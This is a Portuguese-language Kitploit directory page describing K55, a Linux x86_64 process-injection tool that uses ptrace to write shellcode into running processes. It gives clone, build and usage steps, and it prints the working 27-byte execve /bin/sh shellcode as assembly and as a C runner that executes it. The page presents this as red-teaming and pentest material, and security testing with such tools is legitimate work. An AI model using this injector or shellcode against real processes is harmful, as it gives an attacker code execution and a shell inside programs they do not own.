Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
K55 — Utilitário de Injeção de Processos para Linux x86_64 | Kitploit
Ferramentas/GitHubGitHub/josh0xa/k55
ExploraçãoShellcodeRed Teaming
GitHubjosh0xa/k55

K55

Utilitário de Injeção de Processos para Linux x86_64

Ver Repositório
5913há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

K55 - Utilitário de Injeção de Processos Linux x86_64 (C++14)

lisence

Sobre o K55

(pronunciado: "kay fifty-five")
O K55 é uma ferramenta de injeção de payloads usada para injetar payloads de shellcode x86_64 em processos em execução. O utilitário foi desenvolvido usando técnicas modernas de C++11, bem como algumas funções tradicionais C do Linux, como ptrace(). O shellcode gerado no processo alvo tem 27 bytes e executa /bin/sh (gera um shell bash) dentro do espaço de endereço do alvo. No futuro, permitirei que os usuários insiram seu próprio shellcode via argumentos de linha de comando.

Instalação

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

Uso do K55

Usage: ./K55 <process-name>

  • process-name pode ser qualquer processo Linux com permissões r-xp ou execstack.

Testes

Teste 1) Em um terminal (diretório K55/), execute: ./k55_example_process/k55_test_process
Teste 2) Em outro terminal, execute o injetor: sudo ./K55 k55_test_process

K55 em Ação

  • Um shell é gerado no k55_test_process quando o injetor de shellcode K55 é executado (como root).

Injetando no Processo Dado

Shell Gerado no Alvo

Limitações

Obviamente, as chamadas ptrace(PTRACE_POKETEXT...) não são as mais disfarçadas. Portanto, alguns aplicativos podem limitar o efeito do K55. No entanto, para testes de segurança, certifique-se de ativar o execstack para seus aplicativos alvo. Por exemplo, se estou testando no gdb, antes de injetar, executaria o seguinte: sudo execstack -s /usr/bin/gdb. Instale o execstack pelo gerenciador de pacotes da sua distribuição. Para usuários de Arch Linux, você pode encontrar o execstack no AUR.

Criando o Payload do Shell

Nota: A seguir está uma demonstração. A string do payload já está codificada no K55.

Implementação em Assembly do Payload (Citado do shell-storm (redirecionamento))

root@kitploit:~
main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall

Implementação em C do Payload

root@kitploit:~
#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

Referências

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

Licença

Licença MIT
Copyright (c) Josh Schiavone

Baixar ferramenta